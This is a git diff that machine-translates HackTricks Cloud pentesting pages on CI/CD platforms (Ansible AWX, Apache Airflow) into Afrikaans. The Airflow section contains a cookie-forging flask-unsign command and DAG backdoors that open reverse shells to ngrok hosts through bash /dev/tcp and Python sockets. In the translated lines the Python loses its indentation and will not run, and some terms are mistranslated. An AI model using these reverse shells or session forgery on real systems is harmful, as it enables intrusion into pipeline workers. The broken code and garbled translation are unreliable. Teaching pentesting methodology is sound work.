diff --git a/src/README.md b/src/README.md
index 01b146fd1..9febd33f4 100644
--- a/src/README.md
+++ b/src/README.md
@@ -6,35 +6,31 @@ Reading time: {{ #reading_time }}
 
 <figure><img src="images/cloud.gif" alt=""><figcaption></figcaption></figure>
 
-_Hacktricks logos & motion designed by_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._
+_Hacktricks logo's & bewegingsontwerp deur_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._
 
 > [!TIP]
-> Welcome to the page where you will find each **hacking trick/technique/whatever related to CI/CD & Cloud** I have learnt in **CTFs**, **real** life **environments**, **researching**, and **reading** researches and news.
+> Welkom op die bladsy waar jy elke **hacking trick/technique/whatever verwant aan CI/CD & Cloud** sal vind wat ek geleer het in **CTFs**, **werklike** lewe **omgewings**, **navorsing**, en **lees** navorsings en nuus.
 
-### **Pentesting CI/CD Methodology**
+### **Pentesting CI/CD Metodologie**
 
-**In the HackTricks CI/CD Methodology you will find how to pentest infrastructure related to CI/CD activities.** Read the following page for an **introduction:**
+**In die HackTricks CI/CD Metodologie sal jy vind hoe om infrastruktuur wat verband hou met CI/CD aktiwiteite te pentest.** Lees die volgende bladsy vir 'n **inleiding:**
 
 [pentesting-ci-cd-methodology.md](pentesting-ci-cd/pentesting-ci-cd-methodology.md)
 
-### Pentesting Cloud Methodology
+### Pentesting Cloud Metodologie
 
-**In the HackTricks Cloud Methodology you will find how to pentest cloud environments.** Read the following page for an **introduction:**
+**In die HackTricks Cloud Metodologie sal jy vind hoe om wolkomgewings te pentest.** Lees die volgende bladsy vir 'n **inleiding:**
 
 [pentesting-cloud-methodology.md](pentesting-cloud/pentesting-cloud-methodology.md)
 
-### License & Disclaimer
+### Lisensie & Vrywaring
 
-**Check them in:**
+**Kyk hulle in:**
 
 [HackTricks Values & FAQ](https://app.gitbook.com/s/-L_2uGJGU7AVNRcqRvEi/welcome/hacktricks-values-and-faq)
 
-### Github Stats
+### Github Statistieke
 
-![HackTricks Cloud Github Stats](https://repobeats.axiom.co/api/embed/1dfdbb0435f74afa9803cd863f01daac17cda336.svg)
+![HackTricks Cloud Github Statistieke](https://repobeats.axiom.co/api/embed/1dfdbb0435f74afa9803cd863f01daac17cda336.svg)
 
 {{#include ./banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/SUMMARY.md b/src/SUMMARY.md
index feae5163c..1b1d60c58 100644
--- a/src/SUMMARY.md
+++ b/src/SUMMARY.md
@@ -505,3 +505,5 @@
 
 
 
+
+
diff --git a/src/banners/hacktricks-training.md b/src/banners/hacktricks-training.md
index b684cee3d..3d22ffbf2 100644
--- a/src/banners/hacktricks-training.md
+++ b/src/banners/hacktricks-training.md
@@ -1,17 +1,13 @@
 > [!TIP]
-> Learn & practice AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
-> Learn & practice GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
+> Leer & oefen AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
+> Leer & oefen GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
 >
 > <details>
 >
-> <summary>Support HackTricks</summary>
+> <summary>Ondersteun HackTricks</summary>
 >
-> - Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-> - **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-> - **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+> - Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)!
+> - **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+> - **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 >
 > </details>
-
-
-
-
diff --git a/src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md b/src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md
index d3fbf19e5..932ac34b4 100644
--- a/src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md
+++ b/src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md
@@ -4,60 +4,59 @@
 
 ## Basic Information
 
-**Ansible Tower** or it's opensource version [**AWX**](https://github.com/ansible/awx) is also known as **Ansible’s user interface, dashboard, and REST API**. With **role-based access control**, job scheduling, and graphical inventory management, you can manage your Ansible infrastructure from a modern UI. Tower’s REST API and command-line interface make it simple to integrate it into current tools and workflows.
+**Ansible Tower** of sy oopbron weergawe [**AWX**](https://github.com/ansible/awx) is ook bekend as **Ansible se gebruikerskoppelvlak, dashboard, en REST API**. Met **rolgebaseerde toegangbeheer**, werkskedulering, en grafiese inventarisbestuur, kan jy jou Ansible-infrastruktuur vanaf 'n moderne UI bestuur. Tower se REST API en opdraglyn koppelvlak maak dit eenvoudig om dit in huidige gereedskap en werksvloeie te integreer.
 
-**Automation Controller is a newer** version of Ansible Tower with more capabilities.
+**Automation Controller is 'n nuwer** weergawe van Ansible Tower met meer vermoëns.
 
 ### Differences
 
-According to [**this**](https://blog.devops.dev/ansible-tower-vs-awx-under-the-hood-65cfec78db00), the main differences between Ansible Tower and AWX is the received support and the Ansible Tower has additional features such as role-based access control, support for custom APIs, and user-defined workflows.
+Volgens [**hierdie**](https://blog.devops.dev/ansible-tower-vs-awx-under-the-hood-65cfec78db00), is die hoof verskille tussen Ansible Tower en AWX die ontvangde ondersteuning en die Ansible Tower het addisionele funksies soos rolgebaseerde toegangbeheer, ondersteuning vir pasgemaakte API's, en gebruikersgedefinieerde werksvloeie.
 
 ### Tech Stack
 
-- **Web Interface**: This is the graphical interface where users can manage inventories, credentials, templates, and jobs. It's designed to be intuitive and provides visualizations to help with understanding the state and results of your automation jobs.
-- **REST API**: Everything you can do in the web interface, you can also do via the REST API. This means you can integrate AWX/Tower with other systems or script actions that you'd typically perform in the interface.
-- **Database**: AWX/Tower uses a database (typically PostgreSQL) to store its configuration, job results, and other necessary operational data.
-- **RabbitMQ**: This is the messaging system used by AWX/Tower to communicate between the different components, especially between the web service and the task runners.
-- **Redis**: Redis serves as a cache and a backend for the task queue.
+- **Web Interface**: Dit is die grafiese koppelvlak waar gebruikers inventarisse, akrediteer, sjablone, en werksgeleenthede kan bestuur. Dit is ontwerp om intuïtief te wees en bied visualiseringe om te help met die begrip van die toestand en resultate van jou outomatiseringswerk.
+- **REST API**: Alles wat jy in die webkoppelvlak kan doen, kan jy ook via die REST API doen. Dit beteken jy kan AWX/Tower met ander stelsels integreer of aksies skryf wat jy tipies in die koppelvlak sou uitvoer.
+- **Database**: AWX/Tower gebruik 'n databasis (tipies PostgreSQL) om sy konfigurasie, werksresultate, en ander nodige operasionele data te stoor.
+- **RabbitMQ**: Dit is die boodskapstelsel wat deur AWX/Tower gebruik word om tussen die verskillende komponente te kommunikeer, veral tussen die webdiens en die taaklopers.
+- **Redis**: Redis dien as 'n kas en 'n agtergrond vir die taaklyn.
 
 ### Logical Components
 
-- **Inventories**: An inventory is a **collection of hosts (or nodes)** against which **jobs** (Ansible playbooks) can be **run**. AWX/Tower allows you to define and group your inventories and also supports dynamic inventories which can **fetch host lists from other systems** like AWS, Azure, etc.
-- **Projects**: A project is essentially a **collection of Ansible playbooks** sourced from a **version control system** (like Git) to pull the latest playbooks when needed..
-- **Templates**: Job templates define **how a particular playbook will be run**, specifying the **inventory**, **credentials**, and other **parameters** for the job.
-- **Credentials**: AWX/Tower provides a secure way to **manage and store secrets, such as SSH keys, passwords, and API tokens**. These credentials can be associated with job templates so that playbooks have the necessary access when they run.
-- **Task Engine**: This is where the magic happens. The task engine is built on Ansible and is responsible for **running the playbooks**. Jobs are dispatched to the task engine, which then runs the Ansible playbooks against the designated inventory using the specified credentials.
-- **Schedulers and Callbacks**: These are advanced features in AWX/Tower that allow **jobs to be scheduled** to run at specific times or triggered by external events.
-- **Notifications**: AWX/Tower can send notifications based on the success or failure of jobs. It supports various means of notifications such as emails, Slack messages, webhooks, etc.
-- **Ansible Playbooks**: Ansible playbooks are configuration, deployment, and orchestration tools. They describe the desired state of systems in an automated, repeatable way. Written in YAML, playbooks use Ansible's declarative automation language to describe configurations, tasks, and steps that need to be executed.
+- **Inventories**: 'n Inventaris is 'n **versameling van gasheers (of nodes)** teenoor welke **werksgeleenthede** (Ansible playbooks) kan **loop**. AWX/Tower laat jou toe om jou inventarisse te definieer en te groepeer en ondersteun ook dinamiese inventarisse wat **gasheerlyste van ander stelsels kan haal** soos AWS, Azure, ens.
+- **Projects**: 'n Projek is in wese 'n **versameling van Ansible playbooks** wat afkomstig is van 'n **weergawebeheerstelsel** (soos Git) om die nuutste playbooks te trek wanneer nodig.
+- **Templates**: Werk sjablone definieer **hoe 'n spesifieke playbook uitgevoer sal word**, wat die **inventaris**, **akrediteer**, en ander **parameters** vir die werk spesifiseer.
+- **Credentials**: AWX/Tower bied 'n veilige manier om **geheime te bestuur en te stoor, soos SSH sleutels, wagwoorde, en API tokens**. Hierdie akrediteer kan met werksjablone geassosieer word sodat playbooks die nodige toegang het wanneer hulle loop.
+- **Task Engine**: Dit is waar die magie gebeur. Die taak enjin is gebou op Ansible en is verantwoordelik vir **die uitvoering van die playbooks**. Werksgeleenthede word na die taak enjin gestuur, wat dan die Ansible playbooks teen die aangewese inventaris met die gespesifiseerde akrediteer uitvoer.
+- **Schedulers and Callbacks**: Dit is gevorderde funksies in AWX/Tower wat toelaat dat **werksgeleenthede geskeduleer kan word** om op spesifieke tye te loop of geaktiveer te word deur eksterne gebeurtenisse.
+- **Notifications**: AWX/Tower kan kennisgewings stuur gebaseer op die sukses of mislukking van werksgeleenthede. Dit ondersteun verskeie middele van kennisgewings soos e-pos, Slack boodskappe, webhooks, ens.
+- **Ansible Playbooks**: Ansible playbooks is konfigurasie, ontplooiing, en orkestrasie gereedskap. Hulle beskryf die gewenste toestand van stelsels op 'n geoutomatiseerde, herhaalbare manier. Geskryf in YAML, gebruik playbooks Ansible se verklarende outomatiserings taal om konfigurasies, take, en stappe wat uitgevoer moet word te beskryf.
 
 ### Job Execution Flow
 
-1. **User Interaction**: A user can interact with AWX/Tower either through the **Web Interface** or the **REST API**. These provide front-end access to all the functionalities offered by AWX/Tower.
+1. **User Interaction**: 'n gebruiker kan met AWX/Tower interaksie hê of deur die **Web Interface** of die **REST API**. Hierdie bied front-end toegang tot al die funksies wat deur AWX/Tower aangebied word.
 2. **Job Initiation**:
-   - The user, via the Web Interface or API, initiates a job based on a **Job Template**.
-   - The Job Template includes references to the **Inventory**, **Project** (containing the playbook), and **Credentials**.
-   - Upon job initiation, a request is sent to the AWX/Tower backend to queue the job for execution.
+- Die gebruiker, via die Web Interface of API, begin 'n werk gebaseer op 'n **Job Template**.
+- Die Job Template sluit verwysings in na die **Inventaris**, **Project** (wat die playbook bevat), en **Credentials**.
+- By werkinitiëring, word 'n versoek na die AWX/Tower agtergrond gestuur om die werk vir uitvoering te plaas.
 3. **Job Queuing**:
-   - **RabbitMQ** handles the messaging between the web component and the task runners. Once a job is initiated, a message is dispatched to the task engine using RabbitMQ.
-   - **Redis** acts as the backend for the task queue, managing queued jobs awaiting execution.
+- **RabbitMQ** hanteer die boodskappe tussen die webkomponent en die taaklopers. Sodra 'n werk geïnisieer is, word 'n boodskap na die taak enjin gestuur met behulp van RabbitMQ.
+- **Redis** dien as die agtergrond vir die taaklyn, wat gequeue werksgeleenthede wat op uitvoering wag bestuur.
 4. **Job Execution**:
-   - The **Task Engine** picks up the queued job. It retrieves the necessary information from the **Database** about the job's associated playbook, inventory, and credentials.
-   - Using the retrieved Ansible playbook from the associated **Project**, the Task Engine runs the playbook against the specified **Inventory** nodes using the provided **Credentials**.
-   - As the playbook runs, its execution output (logs, facts, etc.) gets captured and stored in the **Database**.
+- Die **Task Engine** neem die gequeue werk op. Dit haal die nodige inligting van die **Database** oor die werk se geassosieerde playbook, inventaris, en akrediteer.
+- Met die onttrokken Ansible playbook van die geassosieerde **Project**, voer die Task Engine die playbook teen die gespesifiseerde **Inventaris** nodes uit met die verskafde **Credentials**.
+- Soos die playbook loop, word sy uitvoeringsuitset (logs, feite, ens.) vasgevang en in die **Database** gestoor.
 5. **Job Results**:
-   - Once the playbook finishes running, the results (success, failure, logs) are saved to the **Database**.
-   - Users can then view the results through the Web Interface or query them via the REST API.
-   - Based on job outcomes, **Notifications** can be dispatched to inform users or external systems about the job's status. Notifications could be emails, Slack messages, webhooks, etc.
+- Sodra die playbook klaar is met loop, word die resultate (sukses, mislukking, logs) in die **Database** gestoor.
+- Gebruikers kan dan die resultate deur die Web Interface sien of dit via die REST API opvra.
+- Gebaseer op werksuitkomste, kan **Notifications** gestuur word om gebruikers of eksterne stelsels oor die werk se status in te lig. Kennisgewings kan e-posse, Slack boodskappe, webhooks, ens. wees.
 6. **External Systems Integration**:
-   - **Inventories** can be dynamically sourced from external systems, allowing AWX/Tower to pull in hosts from sources like AWS, Azure, VMware, and more.
-   - **Projects** (playbooks) can be fetched from version control systems, ensuring the use of up-to-date playbooks during job execution.
-   - **Schedulers and Callbacks** can be used to integrate with other systems or tools, making AWX/Tower react to external triggers or run jobs at predetermined times.
+- **Inventories** kan dinamies van eksterne stelsels verkry word, wat AWX/Tower toelaat om gasheers van bronne soos AWS, Azure, VMware, en meer in te trek.
+- **Projects** (playbooks) kan van weergawebeheerstelsels verkry word, wat die gebruik van op-datum playbooks tydens werksuitvoering verseker.
+- **Schedulers and Callbacks** kan gebruik word om met ander stelsels of gereedskap te integreer, wat AWX/Tower laat reageer op eksterne triggers of werksgeleenthede op voorafbepaalde tye laat loop.
 
 ### AWX lab creation for testing
 
-[**Following the docs**](https://github.com/ansible/awx/blob/devel/tools/docker-compose/README.md) it's possible to use docker-compose to run AWX:
-
+[**Volg die docs**](https://github.com/ansible/awx/blob/devel/tools/docker-compose/README.md) is dit moontlik om docker-compose te gebruik om AWX te loop:
 ```bash
 git clone -b x.y.z https://github.com/ansible/awx.git # Get in x.y.z the latest release version
 
@@ -83,61 +82,56 @@ docker exec -ti tools_awx_1 awx-manage createsuperuser
 # Load demo data
 docker exec tools_awx_1 awx-manage create_preload_data
 ```
-
 ## RBAC
 
-### Supported roles
+### Ondersteunde rolle
 
-The most privileged role is called **System Administrator**. Anyone with this role can **modify anything**.
+Die mees bevoorregte rol word **Sisteem Administrateur** genoem. Enige iemand met hierdie rol kan **enige iets** **wysig**.
 
-From a **white box security** review, you would need the **System Auditor role**, which allow to **view all system data** but cannot make any changes. Another option would be to get the **Organization Auditor role**, but it would be better to get the other one.
+Vanuit 'n **wit boks sekuriteit** hersiening, sal jy die **Sisteem Ouditeur rol** benodig, wat toelaat om **alle stelseldatas** te **bekyk** maar nie enige veranderinge kan aanbring nie. 'n Ander opsie sou wees om die **Organisasie Ouditeur rol** te verkry, maar dit sou beter wees om die ander een te kry.
 
 <details>
 
-<summary>Expand this to get detailed description of available roles</summary>
+<summary>Breek dit uit om 'n gedetailleerde beskrywing van beskikbare rolle te kry</summary>
 
-1. **System Administrator**:
-   - This is the superuser role with permissions to access and modify any resource in the system.
-   - They can manage all organizations, teams, projects, inventories, job templates, etc.
-2. **System Auditor**:
-   - Users with this role can view all system data but cannot make any changes.
-   - This role is designed for compliance and oversight.
-3. **Organization Roles**:
-   - **Admin**: Full control over the organization's resources.
-   - **Auditor**: View-only access to the organization's resources.
-   - **Member**: Basic membership in an organization without any specific permissions.
-   - **Execute**: Can run job templates within the organization.
-   - **Read**: Can view the organization’s resources.
-4. **Project Roles**:
-   - **Admin**: Can manage and modify the project.
-   - **Use**: Can use the project in a job template.
-   - **Update**: Can update project using SCM (source control).
-5. **Inventory Roles**:
-   - **Admin**: Can manage and modify the inventory.
-   - **Ad Hoc**: Can run ad hoc commands on the inventory.
-   - **Update**: Can update the inventory source.
-   - **Use**: Can use the inventory in a job template.
-   - **Read**: View-only access.
-6. **Job Template Roles**:
-   - **Admin**: Can manage and modify the job template.
-   - **Execute**: Can run the job.
-   - **Read**: View-only access.
-7. **Credential Roles**:
-   - **Admin**: Can manage and modify the credentials.
-   - **Use**: Can use the credentials in job templates or other relevant resources.
-   - **Read**: View-only access.
-8. **Team Roles**:
-   - **Member**: Part of the team but without any specific permissions.
-   - **Admin**: Can manage the team's members and associated resources.
-9. **Workflow Roles**:
-   - **Admin**: Can manage and modify the workflow.
-   - **Execute**: Can run the workflow.
-   - **Read**: View-only access.
+1. **Sisteem Administrateur**:
+- Dit is die supergebruiker rol met toestemmings om toegang te verkry en enige hulpbron in die stelsel te wysig.
+- Hulle kan alle organisasies, spanne, projekte, inventarisse, werksjablone, ens. bestuur.
+2. **Sisteem Ouditeur**:
+- Gebruikers met hierdie rol kan alle stelseldatas bekijk maar nie enige veranderinge aanbring nie.
+- Hierdie rol is ontwerp vir nakoming en toesig.
+3. **Organisasie Rolle**:
+- **Admin**: Volle beheer oor die organisasie se hulpbronne.
+- **Ouditeur**: Slegs lees toegang tot die organisasie se hulpbronne.
+- **Lid**: Basiese lidmaatskap in 'n organisasie sonder enige spesifieke toestemmings.
+- **Voer Uit**: Kan werksjablone binne die organisasie uitvoer.
+- **Lees**: Kan die organisasie se hulpbronne bekijk.
+4. **Projekt Rolle**:
+- **Admin**: Kan die projek bestuur en wysig.
+- **Gebruik**: Kan die projek in 'n werksjabloon gebruik.
+- **Opdateer**: Kan die projek opdateer met SCM (bronbeheer).
+5. **Inventaris Rolle**:
+- **Admin**: Kan die inventaris bestuur en wysig.
+- **Ad Hoc**: Kan ad hoc opdragte op die inventaris uitvoer.
+- **Opdateer**: Kan die inventarisbron opdateer.
+- **Gebruik**: Kan die inventaris in 'n werksjabloon gebruik.
+- **Lees**: Slegs lees toegang.
+6. **Werksjabloon Rolle**:
+- **Admin**: Kan die werksjabloon bestuur en wysig.
+- **Voer Uit**: Kan die werk uitvoer.
+- **Lees**: Slegs lees toegang.
+7. **Geloofsbriewe Rolle**:
+- **Admin**: Kan die geloofsbriewe bestuur en wysig.
+- **Gebruik**: Kan die geloofsbriewe in werksjablone of ander relevante hulpbronne gebruik.
+- **Lees**: Slegs lees toegang.
+8. **Span Rolle**:
+- **Lid**: Deel van die span maar sonder enige spesifieke toestemmings.
+- **Admin**: Kan die span se lede en geassosieerde hulpbronne bestuur.
+9. **Werkvloei Rolle**:
+- **Admin**: Kan die werkvloei bestuur en wysig.
+- **Voer Uit**: Kan die werkvloei uitvoer.
+- **Lees**: Slegs lees toegang.
 
 </details>
 
 {{#include ../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/apache-airflow-security/README.md b/src/pentesting-ci-cd/apache-airflow-security/README.md
index aac46128c..389611d80 100644
--- a/src/pentesting-ci-cd/apache-airflow-security/README.md
+++ b/src/pentesting-ci-cd/apache-airflow-security/README.md
@@ -2,22 +2,21 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-### Basic Information
+### Basiese Inligting
 
-[**Apache Airflow**](https://airflow.apache.org) serves as a platform for **orchestrating and scheduling data pipelines or workflows**. The term "orchestration" in the context of data pipelines signifies the process of arranging, coordinating, and managing complex data workflows originating from various sources. The primary purpose of these orchestrated data pipelines is to furnish processed and consumable data sets. These data sets are extensively utilized by a myriad of applications, including but not limited to business intelligence tools, data science and machine learning models, all of which are foundational to the functioning of big data applications.
+[**Apache Airflow**](https://airflow.apache.org) dien as 'n platform vir **die orkestrering en skedulering van datapipelines of werksvloei**. Die term "orkestrering" in die konteks van datapipelines dui op die proses van die rangskikking, koördinering en bestuur van komplekse dataverkies wat uit verskeie bronne ontstaan. Die primêre doel van hierdie georkestreerde datapipelines is om verwerkte en verbruikbare datastelle te verskaf. Hierdie datastelle word wyd gebruik deur 'n menigte toepassings, insluitend maar nie beperk tot besigheidsintelligensie-instrumente, datawetenskap en masjienleer modelle, wat almal fundamenteel is vir die funksionering van groot data toepassings.
 
-Basically, Apache Airflow will allow you to **schedule the execution of code when something** (event, cron) **happens**.
+Basies sal Apache Airflow jou toelaat om **die uitvoering van kode te skeduleer wanneer iets** (gebeurtenis, cron) **gebeur**.
 
-### Local Lab
+### Plaaslike Laboratorium
 
 #### Docker-Compose
 
-You can use the **docker-compose config file from** [**https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml**](https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml) to launch a complete apache airflow docker environment. (If you are in MacOS make sure to give at least 6GB of RAM to the docker VM).
+Jy kan die **docker-compose konfigurasie lêer van** [**https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml**](https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml) gebruik om 'n volledige apache airflow docker omgewing te begin. (As jy op MacOS is, maak seker jy gee ten minste 6GB RAM aan die docker VM).
 
 #### Minikube
 
-One easy way to **run apache airflo**w is to run it **with minikube**:
-
+Een maklike manier om **apache airflow** te **hardloop is om dit met minikube** te hardloop:
 ```bash
 helm repo add airflow-stable https://airflow-helm.github.io/charts
 helm repo update
@@ -27,10 +26,9 @@ helm install airflow-release airflow-stable/airflow
 # Use this command to delete it
 helm delete airflow-release
 ```
+### Airflow Konfigurasie
 
-### Airflow Configuration
-
-Airflow might store **sensitive information** in its configuration or you can find weak configurations in place:
+Airflow mag **sensitiewe inligting** in sy konfigurasie stoor of jy kan swak konfigurasies in plek vind:
 
 {{#ref}}
 airflow-configuration.md
@@ -38,65 +36,62 @@ airflow-configuration.md
 
 ### Airflow RBAC
 
-Before start attacking Airflow you should understand **how permissions work**:
+Voordat jy begin om Airflow aan te val, moet jy verstaan **hoe toestemmings werk**:
 
 {{#ref}}
 airflow-rbac.md
 {{#endref}}
 
-### Attacks
+### Aanvalle
 
-#### Web Console Enumeration
+#### Web Konsolering
 
-If you have **access to the web console** you might be able to access some or all of the following information:
+As jy **toegang tot die webkonsol** het, mag jy in staat wees om sommige of al die volgende inligting te bekom:
 
-- **Variables** (Custom sensitive information might be stored here)
-- **Connections** (Custom sensitive information might be stored here)
-  - Access them in `http://<airflow>/connection/list/`
-- [**Configuration**](./#airflow-configuration) (Sensitive information like the **`secret_key`** and passwords might be stored here)
-- List **users & roles**
-- **Code of each DAG** (which might contain interesting info)
+- **Veranderlikes** (Pasgemaakte sensitiewe inligting mag hier gestoor word)
+- **Verbindings** (Pasgemaakte sensitiewe inligting mag hier gestoor word)
+- Toegang tot hulle in `http://<airflow>/connection/list/`
+- [**Konfigurasie**](./#airflow-configuration) (Sensitiewe inligting soos die **`secret_key`** en wagwoorde mag hier gestoor word)
+- Lys **gebruikers & rolle**
+- **Kode van elke DAG** (wat interessante inligting mag bevat)
 
-#### Retrieve Variables Values
+#### Herwin Veranderlikes Waardes
 
-Variables can be stored in Airflow so the **DAGs** can **access** their values. It's similar to secrets of other platforms. If you have **enough permissions** you can access them in the GUI in `http://<airflow>/variable/list/`.\
-Airflow by default will show the value of the variable in the GUI, however, according to [**this**](https://marclamberti.com/blog/variables-with-apache-airflow/) it's possible to set a **list of variables** whose **value** will appear as **asterisks** in the **GUI**.
+Veranderlikes kan in Airflow gestoor word sodat die **DAGs** hul waardes kan **toegang**. Dit is soortgelyk aan geheime van ander platforms. As jy **genoeg toestemmings** het, kan jy hulle in die GUI in `http://<airflow>/variable/list/` toegang.\
+Airflow sal standaard die waarde van die veranderlike in die GUI wys, egter, volgens [**hierdie**](https://marclamberti.com/blog/variables-with-apache-airflow/) is dit moontlik om 'n **lys van veranderlikes** in te stel waarvan die **waarde** as **sterretjies** in die **GUI** sal verskyn.
 
 ![](<../../images/image (164).png>)
 
-However, these **values** can still be **retrieved** via **CLI** (you need to have DB access), **arbitrary DAG** execution, **API** accessing the variables endpoint (the API needs to be activated), and **even the GUI itself!**\
-To access those values from the GUI just **select the variables** you want to access and **click on Actions -> Export**.\
-Another way is to perform a **bruteforce** to the **hidden value** using the **search filtering** it until you get it:
+Egter, hierdie **waardes** kan steeds **herwin** word via **CLI** (jy moet DB toegang hê), **arbitraire DAG** uitvoering, **API** toegang tot die veranderlikes eindpunt (die API moet geaktiveer wees), en **selfs die GUI self!**\
+Om toegang tot daardie waardes vanaf die GUI te verkry, kies net die **veranderlikes** wat jy wil toegang en **klik op Aksies -> Eksporteer**.\
+'n Ander manier is om 'n **bruteforce** op die **verborge waarde** uit te voer deur die **soekfilter** totdat jy dit kry:
 
 ![](<../../images/image (152).png>)
 
-#### Privilege Escalation
-
-If the **`expose_config`** configuration is set to **True**, from the **role User** and **upwards** can **read** the **config in the web**. In this config, the **`secret_key`** appears, which means any user with this valid they can **create its own signed cookie to impersonate any other user account**.
+#### Privilege Escalatie
 
+As die **`expose_config`** konfigurasie op **Waar** gestel is, kan die **rol Gebruiker** en **bo** die **konfig in die web** **lees**. In hierdie konfig, verskyn die **`secret_key`**, wat beteken enige gebruiker met hierdie geldige kan **sy eie onderteken koekie skep om enige ander gebruikersrekening na te boots**.
 ```bash
 flask-unsign --sign --secret '<secret_key>' --cookie "{'_fresh': True, '_id': '12345581593cf26619776d0a1e430c412171f4d12a58d30bef3b2dd379fc8b3715f2bd526eb00497fcad5e270370d269289b65720f5b30a39e5598dad6412345', '_permanent': True, 'csrf_token': '09dd9e7212e6874b104aad957bbf8072616b8fbc', 'dag_status_filter': 'all', 'locale': 'en', 'user_id': '1'}"
 ```
-
 #### DAG Backdoor (RCE in Airflow worker)
 
-If you have **write access** to the place where the **DAGs are saved**, you can just **create one** that will send you a **reverse shell.**\
-Note that this reverse shell is going to be executed inside an **airflow worker container**:
-
+As jy **skrywe toegang** het tot die plek waar die **DAGs gestoor word**, kan jy eenvoudig **een skep** wat vir jou 'n **omgekeerde skulp** sal stuur.\
+Let daarop dat hierdie omgekeerde skulp binne 'n **airflow worker container** uitgevoer gaan word:
 ```python
 import pendulum
 from airflow import DAG
 from airflow.operators.bash import BashOperator
 
 with DAG(
-    dag_id='rev_shell_bash',
-    schedule_interval='0 0 * * *',
-    start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
+dag_id='rev_shell_bash',
+schedule_interval='0 0 * * *',
+start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
 ) as dag:
-    run = BashOperator(
-        task_id='run',
-        bash_command='bash -i >& /dev/tcp/8.tcp.ngrok.io/11433  0>&1',
-    )
+run = BashOperator(
+task_id='run',
+bash_command='bash -i >& /dev/tcp/8.tcp.ngrok.io/11433  0>&1',
+)
 ```
 
 ```python
@@ -105,75 +100,66 @@ from airflow import DAG
 from airflow.operators.python import PythonOperator
 
 def rs(rhost, port):
-    s = socket.socket()
-    s.connect((rhost, port))
-    [os.dup2(s.fileno(),fd) for fd in (0,1,2)]
-    pty.spawn("/bin/sh")
+s = socket.socket()
+s.connect((rhost, port))
+[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
+pty.spawn("/bin/sh")
 
 with DAG(
-    dag_id='rev_shell_python',
-    schedule_interval='0 0 * * *',
-    start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
+dag_id='rev_shell_python',
+schedule_interval='0 0 * * *',
+start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
 ) as dag:
-    run = PythonOperator(
-        task_id='rs_python',
-        python_callable=rs,
-        op_kwargs={"rhost":"8.tcp.ngrok.io", "port": 11433}
-    )
+run = PythonOperator(
+task_id='rs_python',
+python_callable=rs,
+op_kwargs={"rhost":"8.tcp.ngrok.io", "port": 11433}
+)
 ```
-
 #### DAG Backdoor (RCE in Airflow scheduler)
 
-If you set something to be **executed in the root of the code**, at the moment of this writing, it will be **executed by the scheduler** after a couple of seconds after placing it inside the DAG's folder.
-
+As jy iets stel om **uitgevoer te word in die wortel van die kode**, op die oomblik van hierdie skrywe, sal dit **deur die skeduleerder uitgevoer word** na 'n paar sekondes nadat dit binne die DAG se gids geplaas is.
 ```python
 import pendulum, socket, os, pty
 from airflow import DAG
 from airflow.operators.python import PythonOperator
 
 def rs(rhost, port):
-    s = socket.socket()
-    s.connect((rhost, port))
-    [os.dup2(s.fileno(),fd) for fd in (0,1,2)]
-    pty.spawn("/bin/sh")
+s = socket.socket()
+s.connect((rhost, port))
+[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
+pty.spawn("/bin/sh")
 
 rs("2.tcp.ngrok.io", 14403)
 
 with DAG(
-    dag_id='rev_shell_python2',
-    schedule_interval='0 0 * * *',
-    start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
+dag_id='rev_shell_python2',
+schedule_interval='0 0 * * *',
